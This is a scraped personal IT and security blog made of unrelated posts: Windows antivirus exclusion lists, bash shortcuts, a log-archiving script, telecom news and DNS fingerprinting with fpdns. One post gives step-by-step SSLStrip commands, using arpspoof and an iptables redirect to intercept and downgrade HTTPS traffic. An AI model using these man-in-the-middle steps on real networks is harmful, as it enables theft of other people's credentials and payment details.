RootAdmin.co.uk

Microsoft has made recommendations that may help you protect a computer that is running Windows Server 2008 R2, Windows Server 2008, Windows Server 2003, Microsoft Windows 2000, Windows XP, Windows Vista, or Windows 7 from viruses. This article also contains information to help you minimize the effect of antivirus software on system and network performance.

For computers that are running Windows Server 2008 R2, Windows Server 2008, Windows Server 2003, Windows 2000, Windows XP, Windows Vista, or Windows 7

Do not scan the following files and folders. These files are not at risk of infection. If you scan these files, serious performance problems may occur because of file locking. Where a specific set of files is identified by name, exclude only those files instead of the whole folder. Sometimes, the whole folder must be excluded. Do not exclude any one of these based on the file name extension. For example, do not exclude all files that have a .dit extension. Microsoft has no control over other files that may use the same extensions as the following files:

Microsoft Windows Update or Automatic Update related files

The Windows Update or Automatic Update database file. This file is located in the following folder:
%windir%\SoftwareDistribution\Datastore
Exclude the Datastore.edb file.
The transaction log files. These files are located in the following folder:
%windir%\SoftwareDistribution\Datastore\Logs
Exclude the following files:

Edb*.log

Note The wildcard character indicates that there may be several files.
Res1.log. The file is named Edbres00001.jrs for Windows Vista, Windows 7, Windows Server 2008, and Windows Server 2008 R2.
Res2.log. The file is named Edbres00002.jrs for Windows Vista, Windows 7, Windows Server 2008, and Windows Server 2008 R2.
Edb.chk
Tmp.edb
The following files in the %windir%\security path should be added to the exclusions list:

*.edb
*.sdb
*.log
*.chk

Note If these files are not excluded, security databases are typically corrupted, and Group Policy cannot be applied when you scan the folder. The wildcard character indicates that there may be several files. Specifically, you must exclude the following files:

Edb.chk
Edb.log
*.log
Security.sdb in the <drive>:\windows\security\database folder

Group Policy related files

Group Policy user registry information. These files are located in the following folder:
%allusersprofile%\
Exclude the following file:
NTUser.pol
Group Policy client settings file. These files are located in the following folder:
%Systemroot%\system32\GroupPolicy\
Exclude the following file:
registry.pol

For more information, click the following article numbers to view the articles in the Microsoft Knowledge Base:
951059  (http://support.microsoft.com/kb/951059/ ) On a Windows Server 2003-based computer, registry-based policy settings are unexpectedly removed after a user logs on to the computer
930597  (http://support.microsoft.com/kb/930597/ ) Some registry-based policy settings are lost and error messages are logged in the Application log on a Windows XP-based computer or on a Windows Vista-based computer

For Windows Server 2008 R2, Windows Server 2008, Windows Server 2003, and Windows 2000 domain controllers

Because domain controllers provide an important service to clients, the risk of disruption of their activities from malicious code from a virus must be minimized. Antivirus software is the generally accepted way to lessen the risk of virus infection. Install and configure antivirus software so that the risk to the domain controller is reduced as much as possible and so that performance is affected as little as possible. The following list contains recommendations to help you configure and install antivirus software on a Windows Server 2008 R2, Windows Server 2008, Windows Server 2003, or on a Windows 2000 domain controller:

Warning We recommend that you apply the following specified configuration to a test configuration to make sure that in your specific environment it does not introduce unexpected factors or compromise the stability of the system. The risk from too much scanning is that files are inappropriately flagged as having been changed. This results in too much replication in Active Directory. If testing verifies that replication is not affected by the following recommendations, you can apply the antivirus software to the production environment.

Note Specific recommendations from antivirus software vendors may supersede the recommendations in the article.

Antivirus software must be installed on all domain controllers in the enterprise. Ideally, try to install such software on all other server and client systems that have to interact with the domain controllers. It is optimal to catch the virus at the earliest point, such as at the firewall or at the client system where the virus is first introduced. This prevents the virus from ever reaching the infrastructure systems that the clients depend on.
Use a version of antivirus software that is designed to work with Active Directory domain controllers and that uses the correct Application Programming Interfaces (APIs) to access files on the server. Older versions of most vendor software inappropriately change file metadata as it is scanned. This causes the File Replication Service engine to recognize a file change and therefore schedule the file for replication. Newer versions prevent this problem. For more information, click the following article number to view the article in the Microsoft Knowledge Base:
815263  (http://support.microsoft.com/kb/815263/ ) Antivirus, backup, and disk optimization programs that are compatible with the File Replication service
Do not use a domain controller to browse the Web or to perform any other activities that may introduce malicious code.
When you can, do not use the domain controller as a file sharing server. Virus scanning software must be run against all files in those shares, and this can put an unsatisfactory load on the processor and the memory resources of the server
Do not put Active Directory or FRS database and log files on NTFS file system compressed volumes.
For more information, click the following article number to view the article in the Microsoft Knowledge Base:
318116  (http://support.microsoft.com/kb/318116/ ) Issues with Jet Databases on compressed drives
Do not scan the following files and folders. These files are not at risk of infection, and if you include them, this may cause serious performance problems because of file locking. Where a specific set of files is identified by name, exclude only those files instead of the whole folder. Sometimes, the whole folder must be excluded. Do not exclude any of these based on the file-name extension. For example, do not exclude all files that have a .dit extension. Microsoft has no control over other files that may use the same extension as those shown here.

Important This section, method, or task contains steps that tell you how to modify the registry. However, serious problems might occur if you modify the registry incorrectly. Therefore, make sure that you follow these steps carefully. For added protection, back up the registry before you modify it. Then, you can restore the registry if a problem occurs. For more information about how to back up and restore the registry, click the following article number to view the article in the Microsoft Knowledge Base:
322756  (http://support.microsoft.com/kb/322756/ ) How to back up and restore the registry in Windows

Active Directory and Active Directory-related files:

Main NTDS database files. The location of these files is specified in the following registry key:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\DSA Database File
The default location is %windir%\ntds. Exclude the following files:
Ntds.dit
Ntds.pat
Active Directory transaction log files. The location of these files is specified in the following registry key:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\Database Log Files Path
The default location is %windir%\ntds. Exclude the following files:
EDB*.log (The wildcard character indicates that there may be several files.)
Res1.log (The file is named Edbres00001.jrs for Windows Server 2008, and Windows Server 2008 R2.)
Res2.log (The file is named Edbres00001.jrs for Windows Server 2008, and Windows Server 2008 R2.)
Ntds.pat
Note Windows Server 2003 no longer uses the Ntds.pat file.
The NTDS Working folder that is specified in the following registry key:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\DSA Working Directory
Exclude the following files:
Temp.edb
Edb.chk

SYSVOL files:

The File Replication Service (FRS) Working folder that is specified in the following registry key:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NtFrs\Parameters\Working Directory
Exclude the following files:
FRS Working Dir\jet\sys\edb.chk
FRS Working Dir\jet\ntfrs.jdb
FRS Working Dir\jet\log\*.log
The FRS Database Log files that are located in the following registry key:
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\NtFrs\Parameters\DB Log File Directory
The default location is %windir%\ntfrs. Exclude the following files:
FRS Working Dir\jet\log\*.log (if the registry key is not set)
FRS Working Dir\jet\log\edbres00001.jrs (Windows Server 2008, and Windows Server 2008 R2)
FRS Working Dir\jet\log\edbres00002.jrs (Windows Server 2008, and Windows Server 2008 R2)
DB Log File Directory\log\*.log (if the registry key is set)
The Staging folder that is specified in the following registry key and all the Staging folder’s sub-folders:
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\NtFrs\Parameters\Replica Sets\GUID\Replica Set Stage

The current location of the Staging folder and all its sub-folders is the file system reparse target of the replica set staging folders. Staging defaults to the following location:

%systemroot%\sysvol\staging areas

The current location of the SYSVOL\SYSVOL folder and all its sub-folders is the file system reparse target of the replica set root. The SYSVOL\SYSVOL folder defaults to the following location:

%systemroot%\sysvol\sysvol
The FRS Preinstall folder that is in the following location:
Replica_root\DO_NOT_REMOVE_NtFrs_PreInstall_Directory
The Preinstall folder is always open when FRS is running.

In summary, the targeted and excluded list of folders for a SYSVOL tree that is placed in its default location would look similar to the following:

1. %systemroot%\sysvol                                                  Exclude
2. %systemroot%\sysvol\domain                                           Scan
3. %systemroot%\sysvol\domain\DO_NOT_REMOVE_NtFrs_PreInstall_Directory  Exclude
4. %systemroot%\sysvol\domain\Policies                                  Scan
5. %systemroot%\sysvol\domain\Scripts                                   Scan
6. %systemroot%\sysvol\staging                                          Exclude
7. %systemroot%\sysvol\staging areas                                    Exclude
8. %systemroot%\sysvol\sysvol                                           Exclude

If any one of these folders or files have been moved or placed in a different location, scan or exclude the equivalent element.
DFS

The same resources that are excluded for a SYSVOL replica set must also be excluded when FRS is used to replicate shares that are mapped to the DFS root and link targets on Windows Server 2008-based, Windows Server 2003-based, or Windows 2000-based member computers or domain controllers.
DHCP

By default, DHCP files that should be excluded are present in the following folder on the server:
%systemroot%\System32\DHCP
Note You should exclude all files and subfolders that exist in this folder.

The location of DHCP files can be changed. To determine the current location of the DHCP files on the server, check the DatabasePath, DhcpLogFilePath, and BackupDatabasePath parameters under the following registry subkey:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\DHCPServer\Parameters

For Windows Server 2008, Windows Server 2003, and Windows 2000 domain controllers

DNS: You should exclude all files and subfolders that exist in the following folder:
%systemroot%\system32\dns
WINS: You should exclude all files and subfolders that exist in the following folder:
%systemroot%\system32\wins

You can get more info here

http://support.microsoft.com/kb/822158

Here is a list of some bash keyboard shortcuts you may or may not find useful

Alt + B     Move cursor backward one word on the current line
Alt + F     Move cursor forward one word on the current line
Ctrl + A     Go to the beginning of the line you are currently typing on
Ctrl + C     Kill whatever you are running
Ctrl + D     Exit the current shell
Ctrl + E     Go to the end of the line you are currently typing on
Ctrl + H     Same as backspace
Ctrl + K     Clear the line after the cursor
Ctrl + L     Clears the Screen, similar to the clear command
Ctrl + U     Clears the line before the cursor position. If you are at the end of the line, clears the entire line.
Ctrl + R     Let’s you search through previously used commands
Ctrl + T     Swap the last two characters before the cursor
Ctrl + W     Delete the word before the cursor
Ctrl + Z     Puts whatever you are running into a suspended background process. fg restores it.
Esc + T     Swap the last two words before the cursor
Tab         Auto-complete files and folder names

Well below is my first attempt at a shell script, firstly understand I am no programmer!

Before we look at it, my server is running OPENVPN and Uncomplicated Firewall(I’m running Ubuntu Server)

So how does it work?

Firstly we declare that we are using the bash shell using
#!/bin/bash

Next we’re setup some vairables, the first is simply formating the date and calling itself TODAYSDATE,
next we set todays archive to be archive.TODAYSDATE and call its self TODAYS_ARCHIVE

Next we create a directory called archive.TODAYSDATE

Now to the best bit, we start processing the logs
- We extract todays logs out of syslog
- From the extracted logs we extract the firewall (Uncomplicated Firewal/ UFW) logs to a seperate file
- Now extract todays messages log
- From todays extracted logs extract all OPENVPN related logs to a seperate log file
- Extract todays apache access.log and error.log
- Provide us with the currently running processes
- Zip it all up to the /archive/ folder
- back back up a directory level and delete the folder called archive.TODAYSDATE
- Now use mutt to attach the zip file to a email and send it

Now for the script – PLEASE FEEL FREE TO USE

#!/bin/bash
# Script By Liam Somerville, www.rootadmin.co.uk
# Use freely

#####################################################################
#                        Set up the variables
#####################################################################
#Set todays date
TODAYSDATE=`date +”%d-%b-%Y”`

#Format Archive
TODAYS_ARCHIVE=archive.$TODAYSDATE

#####################################################################
#                    Finished setting up Variables
#
#                   Now start processing the log files
#####################################################################

# Make a directory called archive with todays date and change to that direcory
mkdir $TODAYS_ARCHIVE
cd $TODAYS_ARCHIVE

#Write the log files
#Archive todays Syslog, extract all firewall related logs to firewall, then
# extract messages
cat /var/log/syslog | grep “`date +”%b %e” `” > syslog.$TODAYSDATE
cat syslog.$TODAYSDATE | grep UFW > firewall_log.$TODAYSDATE
cat /var/log/messages | grep “`date +”%b %e” `” > messages.$TODAYSDATE
#Process the OPEN VPN Server logs
cat syslog.$TODAYSDATE | grep “ovpn-server” > vpn_server_log.$TODAYSDATE
#
#Proceess Apache Logs
cat /var/log/apache2/error.log | grep “`date +”%b %d” `” > apache_error_log.$TODAYSDATE
cat /var/log/apache2/access.log | grep “`date +”%d/%b” `” > apache_access_log.$TODAYSDATE
#
#Process FTP Logs
cat /var/log/vsftpd.log | grep “`date +”%b %e” `” > ftp_log.$TODAYSDATE
#
# Get a list of currently running process
ps aux > Processes.$TODAYSDATE

# Zip up all the logs and delete todays log
zip /archive/$TODAYS_ARCHIVE.zip *
cd ..
rm -r $TODAYS_ARCHIVE

####################################################################
#                     Now email the zip file
###################################################################
echo | mutt -a /archive/$TODAYS_ARCHIVE.zip -s “Event logs for $TODAYSDATE” you@your.email.address.com

Tesco Mobile through its joint venture partnership with O2 is pleased to announce that it will shortly introduce iPhone 3G and iPhone 3GS in Tesco Phone Shops and online through Tesco Direct in the UK.

For further information and for customers interested in pre-registration please visit http://www.tescomobileiphone.com/.

For more information on iPhone, please visit www.apple.com/uk/iphone.

More information can be found on Tesco Mobile at http://www.tescomobile.com/

About Tesco Mobile:

Tesco Mobile is a 50:50 joint venture between Tesco and O2. The company sells exclusively Tesco Mobile branded services in Tesco stores, online and through Tesco Direct, across the UK using O2’s technology and network.

Tesco Mobile is also available in the rapidly expanding estate of Tesco Phone Shops which will number over 100 by the end of 2009.

The network gives its customers value, simplicity and choice, offering them award winning, simple, great value Pay as you go and Pay monthly tariffs with rewards such as free credit and Clubcard points.

It is the fastest growing Pay as you go network in 2009 and has been voted as the number one mobile network for customer satisfaction by Which Magazine (May 09).

Following the decision of the European Parliament that enables European member states to approve laws that force ISPs to disconnect individuals from the Internet, the UK is planning on enforcing its own version of the “three-strikes” law meant to discourage illegal file sharing.

According to The Guardian, Lord Peter Mandelson, the Business Secretary, announced that this law is supposed become reality in 2011. It will go through a 12 months long testing phase that will see warning letters sent to persistent offenders. If the scope of the illegal activity doesn’t drop by at least 70 percent by April 2011, three months later the practice of cutting off the Internet access will be set in motion.

There were a lot of voices raised against this plan. ISPs don’t want the responsibility – it’s bad for their public image, and also raises operational costs. The Open Rights Group sees it as an infringement of basic rights. Times Online reports that even UK’s law enforcement and intelligence services are against it. They fear that pirates will begin to use encryption and thus make their job even harder (not to mention the increase of workload and costs).

On the opposite side sit the music and movie industries. They are, of course, anxious to see the law in practice since they “lose” hundreds of millions of pounds every year.

SIGN THE PETITION http://petitions.number10.gov.uk/dontdisconnectus/ – UK Citizens only

Install fpdns in Ubuntu

sudo aptitude install fpdns

This will complete the installation

Using fpdns

fpdns [-c] [-d] [-f] [-p port] [-Q srcaddr] [-r retry] [-s] [-t timeout] [-v] server

Where: server is an ip address or a resolvable name
or ‘-’ to read list of servers from stdin
-c (where appropriate check CH TXT version) [off]
-d (debug) [off]
-f (force check CH TXT version) [off]
-F (maximum forked processes) [10]
-p port (nameserver is on this port) [53]
-Q srcaddr (source IP address) [0.0.0.0]
-r retry (set number of attempts) [1]
-s (short form) [off]
-t time (set query timeout) [5]
-v (show version)

fpdns Examples

BIND Version 8 Example

fpdns -D google.com

fingerprint (google.com, 216.239.34.10): ISC BIND 8.3.0-RC1 — 8.4.4
fingerprint (google.com, 216.239.36.10): ISC BIND 8.3.0-RC1 — 8.4.4
fingerprint (google.com, 216.239.38.10): ISC BIND 8.3.0-RC1 — 8.4.4
fingerprint (google.com, 216.239.32.10): ISC BIND 8.3.0-RC1 — 8.4.4

BIND Version 9 Example

fpdns -D debianhelp.co.uk

fingerprint (debianhelp.co.uk, 212.67.202.2): ISC BIND 9.2.3rc1 — 9.4.0a0 [recursion enabled]
fingerprint (debianhelp.co.uk, 212.67.203.246): ISC BIND 9.2.3rc1 — 9.4.0a0 [recursion enabled]

TinyDNS Example

fpdns ns1.eu.dedicatedserver.com.

fingerprint (ns1.eu.dedicatedserver.com., 213.198.65.226): DJ Bernstein TinyDNS 1.05

Microsoft windows 2003 Example
fpdns -D microsoft.com

fingerprint (microsoft.com, 207.68.160.190): Microsoft Windows DNS 2003
fingerprint (microsoft.com, 65.54.240.126): Microsoft Windows DNS 2003

SSLStrip will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.

How does this work?

First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send us all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example).

At this point, sslstrip receives the traffic and does its magic.

Requirements

• Python >= 2.4 (apt-get install python)
• The python “twisted-web” module (apt-get install twisted-web)

Setup

• wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.6.tar.gz
• tar zxvf sslstrip-0.6.tar.gz
• cd sslstrip-0.6
• (optional) sudo python ./setup.py install

Running sslstrip

• Flip your machine into forwarding mode. (echo “1″ > /proc/sys/net/ipv4/ip_forward)
• Setup iptables to redirect HTTP traffic to sslstrip. (iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port <listenPort>)
• Run sslstrip. (sslstrip.py -l <listenPort>)
• Run arpspoof to convince a network they should send their traffic to you. (arpspoof -i <interface> -t <targetIP> <gatewayIP>)

That should do it.

- http://www.thoughtcrime.org/software/sslstrip/

We’ll as some of you may know it is possible to sniff on SSL traffic on a network and capture things like usernames, passswords and even creditcard details.

In response to this I (with some considerable help from YaManicKill -http://www.10people.co.uk/) have created a vpn server for my wife and I, her family and my family and YaManicKill to use to help combat this issue.

We leased a VPS box in a datacentre so the connection is fast( instead of hosting the server at a house on an adsl line).  Its been a bit of a mission in setting up, but we got there in the end

RootAdmin.co.uk may move host to the VPS box, but at this moment in time this is just an idea.

Well since I changed my career into IT Security in Novermber 2008 I haven’t done much in the way of networking or subnetting.

Today i suprised my self, I can still stubnet in my head. I was asked by one of the guys from another team if i new what a /25 subnet was. and off the top of my head before i even stood to try and work it out, the answer had left my mouth.

Quite impressed with my self,

Heads up – Juniper are offering free exams at the momment. Think i might do that. We will see.

02 are going to employ a new “traffic management” system on its broadband facilities

Bewteen the hours of 8PM and 11PM customers will notice that the following traffic is restricted and will run slower

File-sharing:

• BitTorrent
• Blubster
• Gnutella
• KaZaA
• WinMX_6688
• WinMX_6699
• eDonkey
• Filetopia
• eDonkey_UDP
• Hotline
• Hotline_1234
• DirectConnect
• GuruGuru
• Soribada
• Soulseek
• Ares
• Rodi
• JoltID
• eMule_UDP
• Waste
• Konspire2b
• ExoSee
• FurthurNet
• MUTE
• GNUnet
• Nodezilla

Newsgroups:

• NNTP
• NNTPS
• TAC_News
• Audio_News
• NTalk
• NetNews
• NAS
• DDI
• Giganews

The problem i see with this is that alot of letgitimate traffic in the linux community is over bit torrent, a lot of applications are distributed over torrents.

Yet again another 02 business dicates its ruling, stuff their customers. – HERE’S  NEW IDEA, UPGRADE YOUR NETWORK.

02 Currently have only 400, 000 customers, so how come other ISP’s manage just fine? Yet another reason why 02 will not see any of my business, im just fed up with their dicatatorship!

Full 02 ruling here http://broadband.o2.co.uk/home/traffic.jsp